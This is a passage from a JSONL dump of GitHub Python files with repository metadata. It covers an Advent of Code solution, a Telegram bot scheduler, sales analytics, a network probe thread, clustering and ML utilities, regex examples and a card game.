'dir'):\n if(len(list(filter(lambda node: node.name == n and node.dir, currentNode.children))) < 1):\n print(\"adding dir %s\" % n)\n nodes.append(Element(n, True, parent=currentNode))\n else:\n if(len(list(filter(lambda node: node.name == n and node.dir, currentNode.children))) < 1):\n nodes.append(Element(n, False, int(s), parent=currentNode))\n elif('$ cd ' in l): #change directory\n #print(\"change dir %s\" % l)\n n = l.split()[-1]\n #print(\"changing to %s\" % n)\n #printTree(root)\n #print([x.name for x in currentNode.children])\n currentNode = list(filter(lambda node: node.name == n and node.dir, currentNode.children))[0]\n #print(results)\n #currentNode = search.find(currentNode, filter_=lambda node: node.name==n and node.dir, maxlevel=1)\n if(not currentNode):\n print(\"NODE NOT FOUND: %s\" % l)\n for n in nodes:\n n.size = n.calculate_size()\n count = 0\n for n in nodes:\n if n.dir and n.size <100001:\n count = count + n.size\n \n freespace = 70000000 - root.size\n print(freespace)\n needed = 30000000 - freespace\n print(needed)\n res = search.findall(root, filter_=lambda node: node.size >= needed and node.dir)\n for r in res:\n print(r.name, r.size)\n sizes = [r.size for r in res]\n sizes.sort()\n print(sizes[0])\n #printTree(root)\n print(count)\n","repo_name":"mrgator85/AdventOfCode","sub_path":"2022/7/day7.py","file_name":"day7.py","file_ext":"py","file_size_in_byte":2715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37218825136","text":"import datetime\r\nuser_data_base = {}\r\n\r\nclass user:\r\n\r\n def __init__(self, name, bussiness_info):\r\n self.name = name\r\n self.business_info = bussiness_info\r\n\r\n def __str__(self):\r\n return self.name\r\n\r\n\r\n\r\nclass business_info:\r\n def __init__(self, name, description, work_days, start_working_day, end_working_day, tfou, hmucbaot, schedule):\r\n self.name = name\r\n self.description = description\r\n self.work_days = work_days\r\n self.start_working_day = start_working_day\r\n self.end_working_day = end_working_day\r\n self.tfou = tfou\r\n self.schedule = schedule\r\n self.hmucbaot = hmucbaot\r\n\r\n def time_management(self):\r\n # преобразование строк в объекты datetime\r\n self.start_working_day = datetime.datetime.strptime(self.start_working_day, '%H:%M')\r\n self.end_working_day = datetime.datetime.strptime(self.end_working_day, '%H:%M')\r\n self.tfou = datetime.timedelta(minutes=self.tfou)\r\n\r\n # вычисление количества интервалов\r\n total_time = self.end_working_day - self.start_working_day\r\n intervals = int(total_time / self.tfou)\r\n\r\n # создание списка для записи по времени\r\n schedule = []\r\n current_time = self.start_working_day\r\n for i in range(intervals):\r\n schedule.append(current_time.strftime('%H:%M'))\r\n current_time += self.tfou\r\n self.schedule = schedule\r\n\r\n","repo_name":"aslan0789/telegrambotadmin","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3936574183","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set_theme(style=\"darkgrid\")\nimport numpy as np\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\n\n\n\nclass Analyser():\n def __init__(self,filename):\n self.fileName=filename\n self.df=self.readFile()\n self.df = self.df.sort_values(by=['Order Date'])\n self.df['day'] = self.df['Order Date'].dt.day\n self.df['year'] = self.df['Order Date'].dt.year\n self.df['month'] = self.df['Order Date'].dt.month\n self.df['month'] = self.df['Order Date'].dt.month_name(locale = 'en_GB.UTF-8')\n\n\n\n\n def read_csv(self,fileName):\n df = pd.read_csv(fileName, sep = ',')\n return df\n\n def read_excel(self,fileName):\n df=pd.read_excel(fileName)\n \n return df\n\n def readFile(self):\n ext=self.fileName.split('.')[1]\n \n if (ext=='csv'):\n return self.read_csv(self.fileName)\n else:\n return self.read_excel(self.fileName)\n\n def getTotalProductByCategory(self):\n f, ax = plt.subplots(figsize=(11, 9))\n ax = sns.countplot(x=\"Category\", data=self.df)\n return f\n\n def getTotalProductBySubCategory(self):\n f, ax = plt.subplots(figsize=(11, 9))\n sns.set(rc={'figure.figsize':(17.7,6)})\n ax = sns.countplot(x=\"Sub-Category\", data=self.df)\n return f\n def getTotalSalesByCategory(self):\n f, ax = plt.subplots(figsize=(11, 9))\n sns.barplot(x=self.df.Category.unique(),\n y=self.df.groupby(['Category'])['Sales'].sum())\n return f\n\n def getTotalQuantitySoldByCategory(self):\n f, ax = plt.subplots(figsize=(11, 9))\n sns.barplot(x=self.df.Category.unique(),\n y=self.df.groupby(['Category'])['Quantity'].sum())\n return f\n\n def getTotalProfitByCategory(self):\n f, ax = plt.subplots(figsize=(11, 9))\n sns.barplot(x=self.df.Category.unique(),\n y=self.df.groupby(['Category'])['Profit'].sum())\n return f\n \n def getDF(self):\n return self.df\n\n def getSummary(self):\n self.df.columns = [c.replace(' ', '_') for c in self.df.columns]\n self.df['year'] = pd.DatetimeIndex(self.df['Order_Date']).year\n\n all_df=[]\n for y in self.df['year'].unique(): \n temp=self.df[self.df['Order_Date'].dt.year == y]\n all_df.append(temp)\n all_df.append(self.df) \n result_text=\"\"\n l=len(all_df)\n if(l==2):\n l=1\n \n for i in range(l):\n year=all_df[i]['year'].unique()\n sales = round(sum(all_df[i]['Sales']),0)\n profit = round(sum(all_df[i]['Profit']),0)\n tP=all_df[i]['Product_Name'].nunique()\n tc=all_df[i]['City'].nunique()\n d=all_df[i].groupby('Product_Name').sum()\n d=d[['Sales','Quantity','Profit']]\n d.reset_index(inplace=True)\n Poduct_max_sold=d.sort_values(by=['Quantity'],ascending=False).head(1)\n Poduct_max_sales=d.sort_values(by=['Sales'],ascending=False).head(1)\n Poduct_max_profit=d.sort_values(by=['Profit'],ascending=False).head(1)\n all_df[i]['diff_years'] = all_df[i]['Ship_Date'] - all_df[i]['Order_Date']\n all_df[i]['diff_years']=all_df[i]['diff_years']/np.timedelta64(1,'D')\n avg_stime=int(round(all_df[i]['diff_years'].mean(),0))\n all_df[i]['diff_years'] = all_df[i]['Ship_Date'] - all_df[i]['Order_Date']\n all_df[i]['diff_years']=all_df[i]['diff_years']/np.timedelta64(1,'D')\n avg_stime=int(round(all_df[i]['diff_years'].mean(),0))\n \n print(year)\n print(f'➤The total sales is €{sales} and total profit is €{profit}.')\n print(f'➤Total of {tP} products are sold over {tc} cities.')\n print(f'➤{Poduct_max_sold.iloc[0, 0]} is the most sold product.')\n print(f'➤{Poduct_max_profit.iloc[0, 0]} is the product with a max sales of €{round(Poduct_max_profit.iloc[0, 1],0)} & profit of €{round(Poduct_max_profit.iloc[0, 3],0)}.')\n print(f'➤Average shipping time for an order is {avg_stime} days.')\n \n \n result_text+=\"\\n{0} \\nThe total sales is €{1} and total profit is €{2}.\\nTotal of {3} products are sold over {4} cities.\\n{5} is the most sold product.\\n{6} is the product with a max sales of €{7} & profit of €{8}.\\nAverage shipping time for an order is {9} days.\".format(year,sales,profit,tP,tc,Poduct_max_sold.iloc[0, 0],Poduct_max_profit.iloc[0, 0],round(Poduct_max_profit.iloc[0, 1],0),round(Poduct_max_profit.iloc[0, 3],0),avg_stime)\n \n return result_text ","repo_name":"BushidoBurn/lLamas-Analytics","sub_path":"Frontend/GUI/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":4757,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14742769548","text":"import socket, struct, threading, time\nfrom enum import IntEnum\nfrom NetworkUtils import *\n\n\nclass ProbeSender(threading.Thread):\n def __init__(self, probe, source_ip, source_port, target_ip, target_port):\n threading.Thread.__init__(self)\n self.probe = probe\n self.source_port = source_port\n self.source_ip = source_ip\n self.target_port = target_port\n self.target_ip = target_ip\n\n def run(self):\n time.sleep(1)\n self.probe.send(self.target_ip)\n\n def change_probe(self, new_probe):\n self.probe = new_probe\n\n","repo_name":"eliasarnold/internetandsecurityproject","sub_path":"src/probes/ProbeSender.py","file_name":"ProbeSender.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3120447119","text":"if __name__ == '__main__':\n vocab = {}\n with open('../../../data/hightemp.txt', 'r') as f:\n data = f.read().split('\\n')\n data.remove('')\n for line in data:\n cols = line.split('\\t')\n chars = list(cols[0])\n for char in chars:\n if not char in vocab:\n vocab[char] = len(vocab)\n print(len(vocab))","repo_name":"tanaka504/NLP100knock","sub_path":"chapter2/k17.py","file_name":"k17.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24740089990","text":"import glob\nimport pandas as pd\nimport numpy as np\nfrom scipy.sparse import csr_matrix\n\n\ndef load_snapshots(subnet_dir):\n \"\"\"\n Loads the snapshot data frames into a dict indexed by the file names\n\n Parameters\n ----------\n subnet_dir: path to experiment data files\n\n Output\n ------\n python dict\n \"\"\"\n\n path_to_vertex_metrics_folder = subnet_dir + 'snapshots/'\n\n snapshot_paths = glob.glob(path_to_vertex_metrics_folder + \\\n \"/vertex_metrics*.csv\")\n snapshots_dict = {}\n for path in snapshot_paths:\n\n # snapshot file name is key\n snapshot_key = path.split('snapshots/')[1].split('.csv')[0]\n snapshots_dict[snapshot_key] = pd.read_csv(path, index_col=0)\n\n return snapshots_dict\n\n\ndef get_snapshot_year(ing_year, active_years):\n \"\"\"\n Returns the smallest year greater than ing year\n \"\"\"\n return min([y for y in active_years if ing_year <= y])\n\n\ndef edge_is_present(G, source, target):\n \"\"\"\n Returns true of there is an edge from source to target\n\n Parameters\n source, target: igraph vertex indices\n\n G: directed igraph object\n \"\"\"\n return G.get_eid(v1=source, v2=target, directed=True, error=False) != -1\n\n\ndef standardize(X, center=False, scale=False):\n \"\"\"\n Standardizes a vector\n\n Parameters\n ---------\n cetner: to center or not to center (by mean)\n scale: to scale or not to scale (by standard deviation)\n \"\"\"\n mu = 0\n sigma = 1\n\n if center:\n mu = np.mean(X)\n\n if scale:\n sigma = np.std(X)\n\n return (X - mu)/sigma\n\n\ndef save_sparse_csr(filename, array):\n \"\"\"\n saves a sparse CSR matrix\n from http://stackoverflow.com/questions/8955448/save-load-scipy-sparse-csr-matrix-in-portable-data-format\n \"\"\"\n np.savez(filename, data=array.data, indices=array.indices,\n indptr=array.indptr, shape=array.shape)\n\n\ndef load_sparse_csr(filename):\n \"\"\"\n Loads a saved CSR matrix\n \"\"\"\n loader = np.load(filename)\n return csr_matrix((loader['data'], loader['indices'], loader['indptr']),\n shape=loader['shape'])\n","repo_name":"idc9/law-net","sub_path":"vertex_metrics_experiment/code/pipeline_helper_functions.py","file_name":"pipeline_helper_functions.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"41766444992","text":"from custom_exceptions.duplicate_customer_exception import DuplicateCustomerException\nfrom custom_exceptions.customer_not_found_exception import CustomerNotFoundException\nfrom data_access_layer.implementation_classes.account_postgres_dao_imp import AccountPostgresDAO\nfrom entities.accounts import Account\nfrom service_layer.implementation_services.account_postgres_service_imp import AccountPostgresServiceImp\n\naccount_dao = AccountPostgresDAO()\naccount_service = AccountPostgresServiceImp(account_dao)\n\nduplicate_account = Account(0, 'checking', 100.00, 1)\n\n\ndef test_duplicate_account_for_create_account():\n try:\n account_service.service_create_account(duplicate_account)\n assert False\n except DuplicateCustomerException as e:\n assert str(e) == \"That account has already been created\"\n\n\ndef test_not_found_for_get_all_customer_accounts_by_id():\n try:\n account_service.service_get_all_customer_accounts_by_id(100)\n assert False\n except CustomerNotFoundException as e:\n assert str(e) == \"This account was not found\"\n\n\ndef test_validate_delete_account_method():\n try:\n account_service.service_delete_account_by_id(1, 10)\n assert False\n except CustomerNotFoundException as e:\n assert str(e) == \"This account was not found\"\n","repo_name":"Alejandro-Fuste/python-bank-application","sub_path":"tests_for_app/postgres_tests/service_tests/test_account_service.py","file_name":"test_account_service.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74502964326","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 26 14:18:56 2017\n\n@author: RizMac\n\"\"\"\n\n\"\"\"\nCombine player and match data\nRun this AFTER Preprocessing.py\n\"\"\"\n\nimport pandas as pd #data processing\n\nMINIMUM_MATCHES = 20\n\n\"\"\"\nFUNCTIONS\n\"\"\"\n\n#Determine whether radiant won the match\ndef getPlayerWin(radiantWin, playerSlot):\n if playerSlot < 5:\n radiant = True\n else:\n radiant = False\n \n return radiantWin == radiant\n\n#Join match table and players table\ndef joinPlayerMatches():\n matches = pd.read_csv('../DataSet/valid_matches.csv')\n players = pd.read_csv('../DataSet/valid_players.csv')\n \n players['start_time'] = 0\n players['duration'] = 0\n players['win'] = True\n \n current = 1.0;\n for index, row in matches.iterrows():\n matchCond = players['match_id'] == row['match_id']\n idx = players[matchCond].index\n \n players.loc[idx, 'start_time'] = row['start_time']\n players.loc[idx, 'duration'] = row['duration']\n players.loc[idx, 'win'] = row['radiant_win'] == (players.loc[idx, 'player_slot'] < 5)\n \n if current % 100 == 0:\n print(\"{:.2f}%\".format(((current / len(matches) * 100)))) \n \n current += 1.0\n \n #write to file\n players.to_csv('../DataSet/valid_player_match.csv', index=False, mode='w')\n\n#Aggregate players from multiple matches\ndef aggregatePlayers():\n playerMatches = pd.read_csv('../DataSet/valid_player_match.csv')\n \n #group rows by account_id\n playerList = [] \n aggregatePlayers = playerMatches.groupby('account_id')\n for id, group in aggregatePlayers:\n matchesPlayed = len(group)\n if matchesPlayed >= MINIMUM_MATCHES:\n #aaggregate data\n gold = group['gold'].mean() + group['gold_spent'].mean() \n gpm = group['gold_per_min'].mean()\n xpm = group['xp_per_min'].mean()\n kills = group['kills'].mean()\n deaths = group['deaths'].mean()\n assists = group['assists'].mean()\n denies = group['denies'].mean()\n lastHits = group['last_hits'].mean()\n stuns = group['stuns'].mean()\n heroDamage = group['hero_damage'].mean()\n towerDamage = group['tower_damage'].mean()\n level = group['level'].mean()\n goldStructure = group['gold_destroying_structure'].mean()\n goldHeros = group['gold_killing_heros'].mean()\n goldCreeps = group['gold_killing_creeps'].mean()\n position = group['position'].mean()\n duration = group['duration'].mean()\n winRate = group['win'].mean()\n gamesPlayed = len(group)\n \n dataPoint = [id, gold, gpm, xpm, kills, deaths, assists, denies, \n lastHits, stuns, heroDamage, towerDamage, level, \n goldStructure, goldHeros, goldCreeps, position, \n duration, winRate, gamesPlayed] \n playerList.append(dataPoint)\n \n #create DataFrame\n columns = ['id', 'gold', 'gpm', 'xpm', 'kills', 'deaths', 'assists', \n 'denies', 'lastHits', 'stuns', 'hero damage', 'tower damage', \n 'level', 'gold from structure', 'gold from hero kills', \n 'gold from creeps', 'average team position', 'duration', \n 'win rate', 'total matches']\n \n playerFrame = pd.DataFrame(playerList, columns=columns) \n \n #save DataFrame to csv\n playerFrame.to_csv('../DataSet/valid_player_dataset.csv', index=False, mode='w')\n\n#check contents of valid_player_match \ndef checkPlayerMatches():\n playerMatches = pd.read_csv('../DataSet/valid_player_match.csv')\n print(playerMatches[:3])\n\n#check contents of valid_player_dataset\ndef checkValidPlayerDataset():\n dataset = pd.read_csv('../DataSet/valid_player_dataset.csv')\n print(dataset[:3])\n print(dataset.shape)\n \n\n\n\n\"\"\"\nRUN PROGRAM\n\"\"\"\n\n#checkPlayerMatches()\n#aggregatePlayers()\ncheckValidPlayerDataset()\n","repo_name":"RizRam/DOTA-2-Machine-Learning-Project","sub_path":"Dota2ML/Aggregate.py","file_name":"Aggregate.py","file_ext":"py","file_size_in_byte":4058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23522676687","text":"import pytest\n\n\ndef test_cors_get_cors_headers(dummy_request):\n from snovault.cors import get_cors_headers\n assert dummy_request.response.headerlist == [\n ('Content-Type', 'text/html; charset=UTF-8'),\n ('Content-Length', '0')\n ]\n headers = {\n 'Access-Control-Allow-Origin': 'some-origin.com',\n 'Vary': 'Origin',\n 'Other': 'Header',\n 'Set-Cookie': 'xyz'\n }\n dummy_request.response.headers.update(headers)\n for header in headers:\n assert header in dummy_request.response.headers\n cors_headers = get_cors_headers(dummy_request)\n assert len(cors_headers) == 2\n assert cors_headers['Access-Control-Allow-Origin'] == 'some-origin.com'\n assert cors_headers['Vary'] == 'Origin'\n","repo_name":"IGVF-DACC/snovault","sub_path":"src/snovault/tests/test_cors.py","file_name":"test_cors.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15582977640","text":"from torch.optim.lr_scheduler import (LinearLR, ExponentialLR, SequentialLR,\n ReduceLROnPlateau,\n EPOCH_DEPRECATION_WARNING)\nimport warnings\nimport torch\n\nfrom typing import List\n\n\nclass WarmupSequentialLR(SequentialLR):\n\n def __init__(\n self,\n optimizer: torch.optim.Optimizer,\n start_factor: float = 0.01,\n end_factor: float = 1,\n total_iters: int = 10,\n gamma: float = 0.995,\n milestones: List[int] = None,\n ):\n\n if milestones is None:\n milestones = [1000]\n\n linear_lr = LinearLR(optimizer,\n start_factor=start_factor,\n end_factor=end_factor,\n total_iters=total_iters)\n\n exponential_lr = ExponentialLR(optimizer, gamma=gamma)\n super().__init__(optimizer, [linear_lr, exponential_lr],\n milestones=milestones)\n\n\nclass ReduceLROnPlateauWithWarmup(ReduceLROnPlateau):\n \"\"\"\n Modified ReduceLROnPlateau, which allows a warmup phase at\n the beginning of training.\n\n Having a warmup phase is useful so we can train the model\n with a high learning rate, without having to worry about\n the learning rate being too high and causing the model to\n diverge in the first few steps.\n \"\"\"\n\n def __init__(self, warmup_epochs: int = 10, **kwargs):\n \"\"\"\n Args:\n warmup_epochs: Number of epochs to use for the warmup phase.\n patience: Number of epochs to wait before reducing the learning rate.\n factor: Factor by which to reduce the learning rate.\n \"\"\"\n # Set default patience\n if 'patience' not in kwargs:\n kwargs['patience'] = 100\n\n # Set default factor\n if 'factor' not in kwargs:\n kwargs['factor'] = 0.8\n\n super().__init__(**kwargs)\n self.warmup_epochs = warmup_epochs\n\n # Set the initial learning rate\n self._initial_step()\n\n def _initial_step(self):\n for i, param_group in enumerate(self.optimizer.param_groups):\n param_group['lr'] = param_group['lr'] / 10\n self.initial_lr = [\n float(param_group['lr'])\n for i, param_group in enumerate(self.optimizer.param_groups)\n ]\n self._last_lr = [group['lr'] for group in self.optimizer.param_groups]\n\n def step(self, metrics: float | torch.Tensor, epoch=None):\n # convert `metrics` to float, in case it's a zero-dim Tensor\n current = float(metrics)\n if epoch is None:\n epoch = self.last_epoch + 1\n else:\n warnings.warn(EPOCH_DEPRECATION_WARNING, UserWarning)\n self.last_epoch = epoch\n\n if self.is_better(current, self.best):\n self.best = current\n self.num_bad_epochs = 0\n else:\n self.num_bad_epochs += 1\n\n if self.in_cooldown:\n self.cooldown_counter -= 1\n self.num_bad_epochs = 0 # ignore any bad epochs in cooldown\n\n if self.last_epoch < self.warmup_epochs:\n self._increase_lr(epoch)\n self.cooldown_counter = self.cooldown\n self.num_bad_epochs = 0\n\n if self.num_bad_epochs > self.patience:\n self._reduce_lr(epoch)\n self.cooldown_counter = self.cooldown\n self.num_bad_epochs = 0\n\n self._last_lr = [group['lr'] for group in self.optimizer.param_groups]\n\n def _increase_lr(self, epoch):\n for i, (param_group, initial_lr) in enumerate(\n zip(self.optimizer.param_groups, self.initial_lr)):\n old_lr = float(param_group['lr'])\n new_lr = old_lr + initial_lr\n param_group['lr'] = new_lr\n if self.verbose:\n epoch_str = (\"%.2f\"\n if isinstance(epoch, float) else \"%.5d\") % epoch\n print('Epoch {}: increasing learning rate'\n ' of group {} to {:.4e}.'.format(epoch_str, i, new_lr))\n","repo_name":"BlauGroup/NanoParticleTools","sub_path":"src/NanoParticleTools/machine_learning/util/learning_rate.py","file_name":"learning_rate.py","file_ext":"py","file_size_in_byte":4070,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"19258935229","text":"\n\nfrom __future__ import print_function\nimport numpy as np\nimport scipy.linalg as sl\nimport pandas as pd\nimport sklearn.cluster as skc\nimport sklearn.metrics as sm\nfrom sklearn import metrics\nfrom sklearn.datasets.samples_generator import make_blobs\nfrom sklearn.preprocessing import StandardScaler\n\n\ngalNum = 25\na = '0.490'\nnumClouds = 3\nloT, hiT = 10**4, 10**4.5\nloN, hiN = 10**-5, 10**-4.5\nbaseLoc = '/home/jacob/research/velas/vela2b/vela{0:d}/a{1:s}/'\nbaseLoc = '/mnt/cluster/abs/cgm/vela2b/vela{0:d}/a{1:s}/'\n\ngalNums = range(21,30)\nexpns = ['0.490']*len(galNums)\nexpns[galNums.index(24)] = '0.450'\n\nfor galNum, a in zip(galNums, expns):\n\n print('\\nGalaxy = {0:d}:'.format(galNum))\n dataloc = baseLoc.format(galNum,a)\n boxfile = '{0:s}vela2b-{1:d}_GZa{2:s}.h5'.format(dataloc,galNum,a)\n # Read in the data and select out the cloud\n d = pd.read_hdf(boxfile, 'data')\n cloudInds = ( (d['temperature']<hiT) & (d['temperature']>loT) & \n (d['density']<hiN) & (d['density']>loN) )\n df = d[cloudInds]\n dataset = df[['x','y','z']]\n dloc = dataset.as_matrix()\n\n # Peform the kmean clustering\n #km = skc.KMeans(n_clusters=numClouds)\n #km.fit(dloc)\n #labels = km.labels_\n #results = pd.DataFrame([dataset.index,labels]).T\n\n # Check the fit with the Silhouette score\n #sm.silhouette_score(dloc, labels, metric='euclidean')\n\n # Compute the clustering using DBSCAN\n db = skc.DBSCAN(eps=0.3,min_samples=10).fit(dloc)\n core_samples_mask = np.zeros_like(db.labels_, dtype=bool)\n core_samples_mask[db.core_sample_indices_] = True\n labels = db.labels_\n\n # Number of clusters in labels, ignoring noise if present.\n n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)\n\n print('Estimated number of clusters: %d' % n_clusters_)\n #print(\"Silhouette Coefficient: %0.3f\" % metrics.silhouette_score(dloc, labels))\n\n\n\n","repo_name":"jrvliet/analysis","sub_path":"metallicity/cloud_clustering.py","file_name":"cloud_clustering.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23321311463","text":"import numpy as np\nimport pylab as plt\nimport matplotlib as mpl\n\n\n\ndef slice_into_patches_with_overlap(image, patchsize=1024, slack=32):\n '''Slices a numpy array image into overlapping patches of size `patchsize`'''\n grid = grid_for_patches(image.shape, patchsize, slack)\n patches = [image[i0:i1, j0:j1] for i0,j0,i1,j1 in grid.reshape(-1, 4)]\n return patches\n\ndef stitch_overlapping_patches(patches, imageshape, slack=32, out=None):\n '''Merges the patches as returned by `slice_into_patches_with_overlap` back into the original shape'''\n patchsize = patches[0].shape[0]\n grid = grid_for_patches(imageshape, patchsize, slack)\n halfslack = slack//2\n i0,i1 = (grid[grid.shape[0]-2,grid.shape[1]-2,(2,3)] - grid[-1,-1,(0,1)])//2\n d0 = np.stack( np.meshgrid( [0]+[ halfslack]*(grid.shape[0]-2)+[ i0]*(grid.shape[0]>1),\n [0]+[ halfslack]*(grid.shape[1]-2)+[ i1]*(grid.shape[1]>1), indexing='ij' ), axis=-1 )\n d1 = np.stack( np.meshgrid( [-halfslack]*(grid.shape[0]-1)+[imageshape[0]], \n [-halfslack]*(grid.shape[1]-1)+[imageshape[1]], indexing='ij' ), axis=-1 )\n d = np.concatenate([d0,d1], axis=-1)\n if out is None:\n out = np.zeros(imageshape[:2]+patches[0].shape[2:])\n for patch,gi,di in zip(patches, d.reshape(-1,4), (grid+d).reshape(-1,4)):\n out[di[0]:di[2], di[1]:di[3]] = patch[gi[0]:gi[2], gi[1]:gi[3]]\n return out\n\ndef grid_for_patches(imageshape, patchsize, slack):\n #helper function for slicing and stitching\n H,W = imageshape[:2]\n stepsize = patchsize - slack\n grid = np.stack( np.meshgrid( np.minimum( np.arange(patchsize, H+stepsize, stepsize), H ), \n np.minimum( np.arange(patchsize, W+stepsize, stepsize), W ), indexing='ij' ), axis=-1 )\n grid = np.concatenate([grid-patchsize, grid], axis=-1)\n grid = np.maximum(0, grid)\n return grid\n \ndef draw_box(box, color='w', linewidth=None):\n '''Convenience function to draw a box (shape:(4,)) on a matplotlib/pylab plot'''\n axes = plt.gca()\n rect = mpl.patches.Rectangle(box[:2], *(box[2:]-box[:2]), linewidth=linewidth, edgecolor=color, facecolor='none')\n axes.add_patch( rect )","repo_name":"alexander-g/Cell-Detection-for-Wood-Anatomy","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"36362969464","text":"\"\"\"\nUna vez que vemos la forma de ver si una cadena cumple el patrón, podemos querer extraer parte de ese patrón, por \nejemplo, las cifras de la fecha (día, mes y año). \n\nNuevamente, las expresiones regulares de java nos ayudan. Cambiemos el ejemplo. Queremos extraer los sumandos y el\nresultado de una cadena así \"xxxx+yyyy=zzzzz\" donde x, y y z representan dígitos y pueden ser en cualquier número.\n \nCon \\d+ indicamos uno o más dígitos. La expresión regular para ver si una cadena cumple ese patrón puede ser \n\"\\d+\\+\\d+=\\d+\". \n\nPuesto que el + tiene un sentido especial en los patrones -indica uno o más-, para ver si hay un \"+\" en la cadena,\ntenemos que \"escaparlo\", por eso el \\ delante.\n\nLas partes que queramos extraer, debemos meterlas entre paréntesis.\n\nAsí, la expresión regular quedaría \"(\\d+)\\+(\\d+)=(\\d+)\".\n\nFuente: http://chuwiki.chuidiang.org/index.php?title=Expresiones_Regulares_en_Java\n\nAutor: Rafael del Castillo Gomariz\n\"\"\"\n\nimport re\n\nstr_to_analyze = \"23+12=35\"\nregex = \"(\\d+)\\+(\\d+)=(\\d+)\"\nmatch = re.search(regex, str_to_analyze)\n\n# Buscamos las partes (será 23, 12 y 35)\nfor n in match.groups():\n print(n)\n\n\"\"\"\nEn la cadena “<a>uno</a><b>dos</b><c>tres</c>” queremos extraer usando expresiones regulares los trozos que hay entre \nlos tags <a>, <b> y <c>, es decir, \"uno\", \"dos\" y \"tres\".\n\"\"\"\n\nregex = \"<[^>]*>([^<]*)</[^>]*>\"\nstr_to_analyze = \"<a>uno</a><b>dos</b><c>tres</c>\"\nfor str_ in re.findall(regex, str_to_analyze):\n print(str_)\n","repo_name":"rdelcastillo/DAW-Python","sub_path":"ejemplosclase/7expresionesregulares/ejemplo2.py","file_name":"ejemplo2.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"es","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"3283947896","text":"class Card(object):\n '''одна карта'''\n RANKS = ['A', '2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K']\n SUITS = ['c', 'd', 'h', 's']\n def __init__(self, rank, suit):\n self.__rank = rank\n self.__suit = suit\n def __str__(self):\n rep = self.__rank + self.__suit\n return rep\n\nclass Hand(object):\n '''рука одного игрока'''\n def __init__(self):\n self.cards = []\n def __str__(self):\n if self.cards:\n rep = ''\n for card in self.cards:\n rep += str(card) + '\\t'\n else:\n rep = '<пусто>'\n return rep\n def clear(self):\n self.cards = []\n def add(self, card):\n self.cards.append(card)\n def give(self, other_hand, card):\n self.cards.remove(card)\n other_hand.add(card)\n\nclass Deck(Hand):\n def populate(self):\n self.cards = []\n for suit in Card.SUITS:\n for rank in Card.RANKS:\n self.add(Card(rank, suit))\n def shuffle(self):\n import random\n random.shuffle(self.cards)\n def deal(self, hands, per_hand = 1):\n for rounds in range(per_hand):\n for hand in hands:\n if self.cards:\n top_card = self.cards[0]\n self.give(hand, top_card)\n else:\n print('в колоде кончились карты!!!')\n\nclass Unprintable_card(Card):\n def __str__(self):\n rep = '<нельзя напечатать>'\n return rep\n\nclass Positionable_card(Card):\n def __init__(self, rank, suit, face_up = True):\n super().__init__(rank, suit)\n self.is_face_up = face_up\n def __str__(self):\n if self.is_face_up:\n rep = super().__str__()\n else:\n rep = 'XX'\n return rep\n def flip(self):\n self.is_face_up = not self.is_face_up\n\ndef main():\n card1 = Card(rank = 'A', suit = 'h')\n card2 = Unprintable_card(rank = 'A', suit = 'q')\n card3 = Positionable_card(rank = 'A', suit = 'c')\n\n print('печатаю CARD')\n print(card1)\n print('печатаю Unprintable_card')\n print(card2)\n print('печатаю Positionable_card')\n print(card3)\n print('переворачиваю')\n card3.flip()\n print('еще раз печатаю Positionable_card')\n print(card3)\n print('переворачиваю')\n card3.flip()\n print('еще раз печатаю Positionable_card')\n print(card3)\n\n\nmain()\n","repo_name":"aomay/python_M.Douson","sub_path":"9/black_jack_2.0/cards3.0.py","file_name":"cards3.0.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41757403942","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Apr 16 17:25:39 2017\r\n\r\n@author: BHANU\r\n\"\"\"\r\n\r\nimport math\r\nimport random\r\n\r\n\r\ndef init_pop(n_var,n_pop,rang):\r\n pop = []\r\n for i in range (n_pop):\r\n contry = []\r\n for j in range (n_var):\r\n new_val = rang[j][0] + random.random()*(rang[j][1] - rang[j][0])\r\n contry.extend([new_val])\r\n pop.append(contry)\r\n return pop\r\n\r\ndef init_range(n_var):\r\n rang = []\r\n for i in range(n_var):\r\n low = 0\r\n high = 10\r\n rang.append([low,high])\r\n return rang\r\n \r\ndef func1(contry,min_max):\r\n val = contry[0]*math.sin(contry[0]*4) + 1.1*contry[1]*math.sin(2*contry[1])\r\n if (min_max == 